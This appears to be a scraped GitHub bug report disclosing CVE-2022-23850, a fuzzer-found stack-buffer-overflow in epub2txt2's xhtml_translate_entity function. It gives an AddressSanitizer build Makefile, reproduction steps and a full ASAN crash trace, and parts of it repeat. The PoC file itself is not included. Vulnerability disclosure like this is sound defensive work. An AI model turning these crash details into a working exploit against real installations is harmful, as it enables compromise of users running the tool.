    OBJECTS := $(patsubst src/%,build/%,$(SOURCES:.c=.o))
    DEPS	:= $(OBJECTS:.o=.deps)
    
    $(TARGET): $(OBJECTS)
    	$(CC) -fsanitize=address -o $(TARGET) $(LDFLAGS) $(OBJECTS) 
    
    build/%.o: src/%.c
    	@mkdir -p build/
    	$(CC) $(CFLAGS) -fsanitize=address -g -DVERSION=\"$(VERSION)\" -DAPPNAME=\"$(APPNAME)\" -MD -MF $(@:.o=.deps) -c -o $@ $< 
    
    clean:
    	$(RM) -r build/ $(TARGET) 
    
    install:
    	install -D -m 755 $(APPNAME) $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	install -D -m 644 man1/epub2txt.1 $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    uninstall:
    	rm -f $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	rm -f $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    -include $(DEPS)
    
    .PHONY: clean install
    
    

**ASAN Report**

    warning [./input/id:000029,sig:11,src:000553,time:174169875,op:havoc,rep:4]:  3 extra bytes at beginning or within zipfile
      (attempting to process anyway)
    file #1:  bad zipfile offset (local header sig):  3
      (attempting to re-compensate)
    /tmp/epub2txt14993/OEBPS/cover.xml  bad CRC aa74ee30  (should be 4874d916)
      error:  invalid compressed data to inflate /tmp/epub2txt14993/OEBPS/images/GeographyofBli-cover.jpg
    file #8:  bad zipfile offset (local header sig):  163411
      (attempting to re-compensate)
    file #8:  bad zipfile offset (local header sig):  163411
    file #9:  bad zipfile offset (local header sig):  181495
    /tmp/epub2txt14993/OEBPS/GeographyofBli_toc.html  bad CRC 0938f2f2  (should be 64dedce7)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_copyright.html  bad CRC 5d8cbd1a  (should be 9b5bfa5d)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_body_split_001.html  bad CRC 1a36209f  (should be 81fec8f3)
    =================================================================
    ==14993==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffcb14 at pc 0x7ffff6e7e3a6 bp 0x7fffffffca60 sp 0x7fffffffc208
    WRITE of size 305 at 0x7fffffffcb14 thread T0
        #0 0x7ffff6e7e3a5  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5)
        #1 0x55555558000e in xhtml_translate_entity src/xhtml.c:576
        #2 0x555555580b34 in xhtml_to_stdout src/xhtml.c:789
        #3 0x555555580680 in xhtml_file_to_stdout src/xhtml.c:700
        #4 0x555555560476 in epub2txt_do_file src/epub2txt.c:494
        #5 0x55555555d3c9 in main src/main.c:187
        #6 0x7ffff6a48bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
        #7 0x55555555c219 in _start (/home/nisl1/nisl8121/Asteriska/fuzz/projects/epub2txt2-master/valid/epub2txt+0x8219)
    
    Address 0x7fffffffcb14 is located in stack of thread T0 at offset 116 in frame
        #0 0x55555557fad4 in xhtml_translate_entity src/xhtml.c:532
    
      This frame has 2 object(s):
        [32, 36) 'v'
        [96, 116) 'out' <== Memory access at offset 116 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5) 
    Shadow bytes around the buggy address:
      0x10007fff7910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7950: 00 00 00 00 f1 f1 f1 f1 04 f2 f2 f2 f2 f2 f2 f2
    =>0x10007fff7960: 00 00[04]f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7980: 00 00 f1 f1 f1 f1 f8 f2 f2 f2 00 00 00 00 00 00
      0x10007fff7990: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
      0x10007fff79a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff79b0: 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f2 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==14993==ABORTING
    
    

**POC**

POC

Any issue plz contact with me:  
admin@hack.best  
OR:  
twitter: @Asteriska8

CVE-2022-23850: [Bug Report]stack-buffer-overflow in Function epub2txt_do_file() AT src/epub2txt.c · Issue #17 · kevinboone/epub2txt2

**Description**

A stack-buffer-overflow was discovered in epub2txt2.  
The issue is being triggered in function xhtml\_translate\_entity() at src/xhtml.c:576

**Version**

Version 2.02 (Lastest)

**Environment**

Ubuntu 18.04, 64bit

**Reproduce****Command**

    git clone the Lastest Version firstly.
    make && make install
    ./epub2txt poc
    

![image](https://user-images.githubusercontent.com/15817126/150640450-2db08fc2-b37f-47fc-a963-532f09e88412.png)

POC file at the bottom of this report.

**With ASAN**

Note: You can use ASAN for more direct verification.

    Compile program with address sanitizer with this command:
    VERSION := 2.02
    CC      := gcc
    CFLAGS  := -Wall -fPIC -fPIE
    LDLAGS  := -pie 
    DESTDIR :=
    PREFIX  := /usr
    BINDIR  := /bin
    MANDIR  := /share/man
    APPNAME := epub2txt
    
    TARGET	:= epub2txt 
    SOURCES := $(shell find src/ -type f -name *.c)
    OBJECTS := $(patsubst src/%,build/%,$(SOURCES:.c=.o))
    DEPS	:= $(OBJECTS:.o=.deps)
    
    $(TARGET): $(OBJECTS)
    	$(CC) -fsanitize=address -o $(TARGET) $(LDFLAGS) $(OBJECTS) 
    
    build/%.o: src/%.c
    	@mkdir -p build/
    	$(CC) $(CFLAGS) -fsanitize=address -g -DVERSION=\"$(VERSION)\" -DAPPNAME=\"$(APPNAME)\" -MD -MF $(@:.o=.deps) -c -o $@ $< 
    
    clean:
    	$(RM) -r build/ $(TARGET) 
    
    install:
    	install -D -m 755 $(APPNAME) $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	install -D -m 644 man1/epub2txt.1 $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    uninstall:
    	rm -f $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	rm -f $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    -include $(DEPS)
    
    .PHONY: clean install
    
    

**ASAN Report**

    warning [./input/id:000029,sig:11,src:000553,time:174169875,op:havoc,rep:4]:  3 extra bytes at beginning or within zipfile
      (attempting to process anyway)
    file #1:  bad zipfile offset (local header sig):  3
      (attempting to re-compensate)
    /tmp/epub2txt14993/OEBPS/cover.xml  bad CRC aa74ee30  (should be 4874d916)
      error:  invalid compressed data to inflate /tmp/epub2txt14993/OEBPS/images/GeographyofBli-cover.jpg
    file #8:  bad zipfile offset (local header sig):  163411
      (attempting to re-compensate)
    file #8:  bad zipfile offset (local header sig):  163411
    file #9:  bad zipfile offset (local header sig):  181495
    /tmp/epub2txt14993/OEBPS/GeographyofBli_toc.html  bad CRC 0938f2f2  (should be 64dedce7)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_copyright.html  bad CRC 5d8cbd1a  (should be 9b5bfa5d)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_body_split_001.html  bad CRC 1a36209f  (should be 81fec8f3)
    =================================================================
    ==14993==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffcb14 at pc 0x7ffff6e7e3a6 bp 0x7fffffffca60 sp 0x7fffffffc208
    WRITE of size 305 at 0x7fffffffcb14 thread T0
        #0 0x7ffff6e7e3a5  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5)
        #1 0x55555558000e in xhtml_translate_entity src/xhtml.c:576
        #2 0x555555580b34 in xhtml_to_stdout src/xhtml.c:789
        #3 0x555555580680 in xhtml_file_to_stdout src/xhtml.c:700
        #4 0x555555560476 in epub2txt_do_file src/epub2txt.c:494
        #5 0x55555555d3c9 in main src/main.c:187
        #6 0x7ffff6a48bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
        #7 0x55555555c219 in _start (/home/nisl1/nisl8121/Asteriska/fuzz/projects/epub2txt2-master/valid/epub2txt+0x8219)
    
    Address 0x7fffffffcb14 is located in stack of thread T0 at offset 116 in frame
        #0 0x55555557fad4 in xhtml_translate_entity src/xhtml.c:532
    
      This frame has 2 object(s):
        [32, 36) 'v'
        [96, 116) 'out' <== Memory access at offset 116 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5) 
    Shadow bytes around the buggy address:
      0x10007fff7910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7950: 00 00 00 00 f1 f1 f1 f1 04 f2 f2 f2 f2 f2 f2 f2
    =>0x10007fff7960: 00 00[04]f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7980: 00 00 f1 f1 f1 f1 f8 f2 f2 f2 00 00 00 00 00 00
      0x10007fff7990: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
      0x10007fff79a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff79b0: 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f2 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==14993==ABORTING
    
    

**POC**

POC

Any issue plz contact with me:  
admin@hack.best  
OR:  
twitter: @Asteriska8

Tag

#ubuntu